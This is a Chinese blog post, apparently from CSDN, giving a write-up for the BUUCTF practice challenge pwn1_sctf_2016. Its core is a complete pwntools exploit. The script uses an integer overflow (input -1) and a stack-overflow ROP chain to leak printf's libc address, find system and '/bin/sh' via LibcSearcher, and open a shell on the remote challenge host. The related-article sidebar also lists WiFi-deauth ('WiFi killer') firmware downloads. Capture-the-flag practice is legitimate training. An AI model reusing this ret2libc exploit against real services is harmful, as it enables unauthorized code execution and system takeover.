Buuctf pwn1_sctf_2016

最新推荐文章于 2024-03-27 16:20:09 发布
最新推荐文章于 2024-03-27 16:20:09 发布
阅读量433 收藏
点赞数 1
分类专栏: CTF 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53809201/article/details/123601467
版权

checksec

在这里插入图片描述

run

在这里插入图片描述

ida

在这里插入图片描述

在这里插入图片描述

在程序中搜索既没有system又没有bin/sh,所以明显的rop

nptr处可以使用整数溢出构造rop

然后可以利用printf函数来泄露程序的libc版本

覆盖返回地址执行system来getshell

exp

from pwn import *
from LibcSearcher import *
context(os = 'linux', arch = 'i386', log_level = 'debug')
elf = ELF("./pwn2")
local = 0
if local:
    r = process("./pwn2")
else:
    r = remote("node4.buuoj.cn",25331)
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
main_addr = elf.symbols['main']

r.recvuntil("How many bytes do you want me to read?")
r.sendline("-1")

leak_payload = b'a'*(0x2C+0x4)+p32(printf_plt)+p32(main_addr)+p32(printf_got)
r.recvuntil("data!\n")
r.sendline(leak_payload)
r.recvuntil("\n")
printf_addr = u32(r.recv(4))
log.success("the printf_addr is " + hex(printf_addr))
libc = LibcSearcher('printf',printf_addr)
libc_base = printf_addr - libc.dump('printf')
system_addr = libc_base + libc.dump('system')
str_bin_sh_addr= libc_base + libc.dump('str_bin_sh')

r.recvuntil("How many bytes do you want me to read?")
r.sendline("-1")
r.recvuntil("data!\n")
payload = b'a'*(0x2C+0x4)+p32(system_addr)+p32(main_addr)+p32(str_bin_sh_addr)
r.sendline(payload)
r.interactive()
微凉_z
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn-ret2libc基础
admin的博客
10-04 802
题源:基本 ROP - CTF Wiki (ctf-wiki.org)ret2libc的例三 这题的特点是:没有system,没有bin/sh。但是有puts,和gets函数。碰到gets函数基本上又是栈溢出大类中的题目。 ①先检查保护 ②:计算system和bin/sh的实际地址。 核心公式就是:函数真实地址=基地址+偏移量 那么我们如何得到 system 函数的地址呢?这里就主要利用了两个知识点 ①system 函数属于 libc,而 libc.so 动态链接...
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
UNCTF pwn部分writeup
sea_time的博客
11-16 414
UNCTF pwn babyrop(栈溢出) 解题过程 首先覆盖变量,然后开启后门,然后通过后门函数来libc leak,然后再次回到后门函数,再次跳转到libc空间执行system("/bin/sh"),需要注意的是,对ret地址进行了check,所以先跳到ret上,然后通过check再到libc空间。 IDA打开 程序很简单 int __cdecl main() { char buf; /...
buuctfpwn1_sctf_2016
最新发布
weixin_54452942的博客
03-27 556
简单易懂~
buuctf pwn (21~24)
cainiao78777的博客
12-26 350
这个可以用这个fmtstr_payload,也可以不用,首先先看一下偏移。分析之后,发现这个if判断不让我们输入的数大于10,那这直接用整数溢出。如果出现超时的情况,就换一下libc版本,多试几次就能找到。栈溢出,没有system函数,没有/bin/sh字符串。这个是格式化字符串漏洞,通过这个漏洞,可以把x覆盖为4。32位elf文件,再看一下程序逻辑。64位elf文件,看一下程序逻辑。64位elf文件,看一下程序逻辑。32位elf文件,看一下逻辑。之前写过相关的,看一下,
buuctf pwn1_sctf_2016
wp568的博客
10-05 196
看到有.‘rodata:0000000000400684 00000008 C /bin/sh’,点进去看。read()并没有限制输入,显然存在栈溢出漏洞。存在后门函数,函数起始位置400596。拖入IDA,shift+F12查看。
[buuctf]pwn1_sctf_2016
逆向萌新的博客
05-30 1402
buuctfpwnpwn1_sctf_2016(细致分析)
BUUCTF|PWN-pwn1_sctf_2016
Rt1Text的博客
04-23 544
1.checksec+运行 32位+NX保护
[BUUCTF]——pwn1_sctf_2016
m0_68381884的博客
03-28 479
拿到文件先检查一下 得出结论这是32位程序且开启了nx保护。 用32位ida打开文件,并使用ida分析,看到较为敏感的“get flag” 双击跟进,找到函数后按F5将其反编译得到我们熟悉的伪代码 看到这个函数的作用就是输出“flag.txt”里的内容,记一下地址flag_addr=08048F0D 进入main函数 双击 vuln 函数, 0x02 编写exp: from pwn import* r=remote("redirect.do-not-trust.h.
BUUCTF Pwn pwn1_sctf_2016
MrTreebook的博客
12-05 1256
BUUCTF Pwn pwn1_sctf_20161.题目下载地址2.checksec检查保护3.IDA分析4.看一下栈大小5.找到后门函数地址6.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 运行一下看看 3.IDA分析 看一下伪代码 int vuln() { const char *v0; // eax char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
BUUCTF pwn——pwn1_sctf_2016
CNS-Enterprise BCC-1701-J
03-12 106
BUUCTF 做题练习
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
ARM7下PWN接口的使用源码,包含C语言及汇编
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
pwn篇:32位及64位无PIE保护ROP方法
weixin_44644249的博客
02-03 1276
32位和64位ROP方法 先记录一下,暂时还没有学会绕过PIE 源码 #include<stdio.h> #include<unistd.h> void vuln_func() { char buf[128]; read(STDIN_FILENO,buf,256);//溢出点 } int main(int argc,char* argv[]) { vuln_func(); write(STDOUT_FILENO,"Hello world\n",13); } 32位 编译
(buuctf) - pwn入门部分wp - rip -- pwn1_sctf_2016
J1ayの博客
09-10 1401
⭐ 【buuctfpwn入门 pwn学习之路引入 栈溢出引入 ⭐test_your_nc 【题目链接】 注意到 Ubuntu 18, Linux系统 。 nc 靶场 nc node3.buuoj.cn 25677 【注】 nc命令详解 -c shell命令为“-e”;使用/bin/sh来执行 [危险] -e 文件名程序在连接后执行 [危险] -b 允许广播 -g 网关源路由跃点,最多8个 -G num源路由指针:4,8,12。。。 -i secs 发送的线
buuctf-pwn1 sctf 2016
weixin_45427676的博客
09-20 700
拿到文件后checksec一下,发现开启了NX保护,说明堆栈不可执行,那我们就不能向堆栈上写东西。 查看一下程序 main()函数调用了vuln()函数,查看一下此函数有没有什么漏洞可以利用,enmenm,发现代码很多不知道什么意思(太菜了太菜了),好好看看这些代码到底啥意思吧~~,部分代码注释如下: 本来看到代码5处,想着能通过向缓冲区S中写入数据,利用栈溢出来覆盖返回地址为后门函数地址,但是fgets()函数告诉我此法不行,因为你最多只能向S中输入32个字符,而缓冲区S的大小为0x3c,也就是需要输入
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ``` 对于 CentOS 或 RHEL 系统: ``` sudo yum install libstdc++.so.6 ``` 请注意,根据你使用的操作系统和软件包管理器,命令可能会有所不同。确保你的系统上已经安装了适当的软件包管理器,并根据你的情况进行相应的调整。如果问题仍然存在,请提供更多的上下文信息,以便我可以提供更具体的解决方案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值